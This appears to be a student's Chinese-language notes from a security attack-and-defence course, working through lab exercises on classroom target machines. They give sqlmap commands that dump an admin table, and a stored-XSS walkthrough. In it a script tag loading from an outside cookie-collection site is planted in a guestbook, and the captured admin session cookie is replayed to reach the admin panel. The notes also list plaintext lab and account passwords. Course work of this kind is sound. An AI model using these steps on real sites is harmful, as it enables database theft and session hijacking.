美文网首页
信息安全攻防课程笔记2018-11-27

信息安全攻防课程笔记2018-11-27

作者: 坚持的皮蛋 | 来源:发表于2018-11-28 11:46 被阅读0次

老师的攻防网站:http://192.168.43.16/Type/?SortID=2
需连接老师的Wifi:TRT-TLIO

python2.7版本与3版本并存
创建虚拟环境
1、创建当前版本虚拟环境:mkvirtualenv bobbyvir
2、创建指定版本虚拟环境:mkvirtualenv --python=c:\python27\python.exe py2.7work
3、进入虚拟环境:workon py2.7work
4、退出虚拟环境:deactivate
5、删除虚拟环境:rmvirtualenv py2.7work

SQLmap:针对SQL没有做防注入攻击的情况。

http://testasp.vulnweb.com/有弱密码

攻防测试一(SQLMAP)

靶机:http://192.168.43.16/Type/?SortID=2
使用工具:sqlmap
按手册操作,最终获取admin账号的密码。
1.检查出是Microsoft Access数据库
(py2.7work) c:\Python27>sqlmap -u http://192.168.43.16/Type/?SortID=2 --random-agent
2.获取表名
(py2.7work) c:\Python27>sqlmap -u http://192.168.43.16/Type/?SortID=2 --random-agent --tables
3.获取列名
(py2.7work) c:\Python27>sqlmap -u http://192.168.43.16/Type/?SortID=2 --random-agent -T admin --columns
4.获取数据
(py2.7work) c:\Python27>sqlmap -u http://192.168.43.16/Type/?SortID=2 --random-agent -T admin --dump

攻防测试二(SQLMAP后提权)

攻防测试三(XSS实验):

靶机:192.168.43.235
管理员:admin,psw:bendss
利用www.xsspt.com网站的cookie获取功能

xsspt账号:snowd2002,psw:xxxnnnn2013cy

xsspt使用说明:1)创建项目;2)选默认模块;3)下一步,讲提示如何插入具体的代码。
如:
<script src=http://xsspt.com/1sIScz?1543373368></script>

具体实验步骤:

1.找出管理员网址:

用WVS软件,扫描靶机,获取靶机的目录结构

step1.png

发现目录为admin,入口为admin_login.asp

2.在靶机中植入木马:

靶机中有留言板,进行留言,并插入木马代码。


step2.png

3.利用www.xsspt.com网站的cookie获取功能

登陆xsspt网站,当靶机管理员在后台访问过留言数据后,木马代码将会把管理员cookie发送到xsspt网站,进入xsspt网站点击刚建立的项目名称可以看到具体的cookie,有可能有多个cookie数值。


step3.png

cookie中的名称为:ASPSESSIONIDASTTTTRB,数值=IPFJHGPCEMCLKOLIIKEDJGOA

4.使用cookie访问靶机:

使用chrome或firefox的web developer插件,输入刚才的cookie

step4.png

完成后用chrome或firefox访问靶机192.168.43.235/admin,将会看到能进入管理员界面。

完成!!!

相关文章

网友评论

      本文标题:信息安全攻防课程笔记2018-11-27

      本文链接:https://www.haomeiwen.com/subject/lvuwqqtx.html